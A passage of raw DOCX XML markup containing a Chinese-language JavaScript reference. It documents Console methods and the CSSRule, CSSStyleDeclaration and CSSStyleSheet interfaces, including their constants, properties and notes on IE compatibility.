        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void profleEnd()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>结束分析。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Console.profileEnd()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void unmonitorEvents(Element object,[string type])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>停止监视</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>的指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any[]values(any object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以数组的形式返回</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="802" w:name="CSS2Properties"/>
      <w:r>
        <w:t>CSS2Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="803" w:name="CSSRule"/>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="803"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表规则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>说明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>中的一条规则：它表示应用到一组特定文档元素的样式信息。</w:t>
      </w:r>
      <w:r>
        <w:t>selectorText</w:t>
      </w:r>
      <w:r>
        <w:t>为这条规则的元素选择器的字符串表示形式，</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>为一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象，表示应用到选中元素上的样式属性及值的集合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>对象模型说明实际上定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>子类型的体系，可用于表示</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表中可能出现的各种规则。这儿列出来的属性是普通的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>类型及其</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleRule</w:t>
      </w:r>
      <w:r>
        <w:t>子类型的属性。样式规则是样式表中最常见也最重要的规则，可能也是你</w:t>
      </w:r>
      <w:r>
        <w:t>在脚本中最喜欢使用的规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更老的版本中，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象只支持</w:t>
      </w:r>
      <w:r>
        <w:t>selectorText</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short STYLE_RULE=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short IMPORT_RULE=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short MEDIA_RULE=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short FONT_FACE_RULE=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short PAGE_RULE=6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NAMESPACE_RULE=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些是下面的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值</w:t>
      </w:r>
      <w:r>
        <w:t>，它们定义它是哪类规则。如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的值不是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象将有这儿没有列出的一些属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string cssText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>规则的完整文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSRule parentRule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含当前规则的规则，如果存在的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleSheet parentStyleSheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含当前规则的样式表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string selectorText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>STYLE_RULE</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性的值为一个选择器文本，该选择器指定当前规则应用到的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleDeclaration style</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>STYLE_RULE</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性定义应用到</w:t>
      </w:r>
      <w:r>
        <w:t>selectorText</w:t>
      </w:r>
      <w:r>
        <w:t>指定的元素上的样式。注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性本身是只读的，但</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象对应的属性是可读写的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前规则的类型。值可以为上面定义的常量之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="804" w:name="CSSStyleDeclaration"/>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="804"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性及值的集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性及其值的</w:t>
      </w:r>
      <w:r>
        <w:t>集合，可以通过和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性名相似的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名来查询或设置这些样式的值。</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个可读写的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>风格声明的对象，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性也是如此。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>Window.getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象，其属性是只读的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象使得</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性来访问。这些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性名非常接近，只有一些小改变，以避免</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的语法错误。由连字符连接的多单词的属性，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"font-family"</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中将没有连字符，同时除第一个词外每个词的首字母大写：</w:t>
      </w:r>
      <w:r>
        <w:t>fontFamily</w:t>
      </w:r>
      <w:r>
        <w:t>。另外，属性</w:t>
      </w:r>
      <w:r>
        <w:t>"float"</w:t>
      </w:r>
      <w:r>
        <w:t>与保留词</w:t>
      </w:r>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:t>冲突，所以它转变为属性</w:t>
      </w:r>
      <w:r>
        <w:t>cssFloat</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，如果使用方括号及字符串来访问属性，可以使用未修改的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:t>性名。</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除了上面提到的，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>还有两个属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string cssText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>样式属性及值的集合的文本表现形式。文本为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表的格式，但没有元素选择器及包围着属性及值的花括号。</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当前</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>包含的属性</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的数目。</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象也是一个类数组对象，它的元素为声明的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式的属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="805" w:name="CSSStyleSheet"/>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="805"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个接口表示</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表。</w:t>
      </w:r>
      <w:r>
        <w:t>它包含若干用于禁用样式表或查询、插入以及删除</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>样式规则的属性及方法。应用于文档的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>styleSheets[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组的成员，也可以通过定义或链接到这个样式表的＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:t>属性来访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>或更早的版本中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>rules[]</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>cssRules[]</w:t>
      </w:r>
      <w:r>
        <w:t>，同时，使用</w:t>
      </w:r>
      <w:r>
        <w:t>addRule()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>removeRule()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>标准的</w:t>
      </w:r>
      <w:r>
        <w:t>insertRule()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>deleteRule()</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CSSRule[]</w:t>
      </w:r>
      <w:r>
        <w:t>cssRules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个只读的类数组对象，维护组成样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中对应的属性为</w:t>
      </w:r>
      <w:r>
        <w:t>rules</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，样式表将禁用并且不会应用到对应文档中。如果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，样式表将启用并会应用到文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string href</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接到当前文档的样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，内联样式表的这个属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个样式表可应用的媒体列表。可以像处理一个单独的字符串一样查询或设置这个属性，或者将它视为一个带有</w:t>
      </w:r>
      <w:r>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:t>Medium()</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>deleteMedium()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的媒体类型的类数组对象。（正式一点说，这个属性的值为一个</w:t>
      </w:r>
      <w:r>
        <w:t>MediaList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但本参考不包含这个类型。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Node ownerNode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拥有</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>当前样式表的文档元素，如果不存在则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Style</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSRule ownerRule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>引入当前样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSRule</w:t>
      </w:r>
      <w:r>
        <w:t>（从一个父样式表中），如果当前样式表以其他方式引入则此项值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
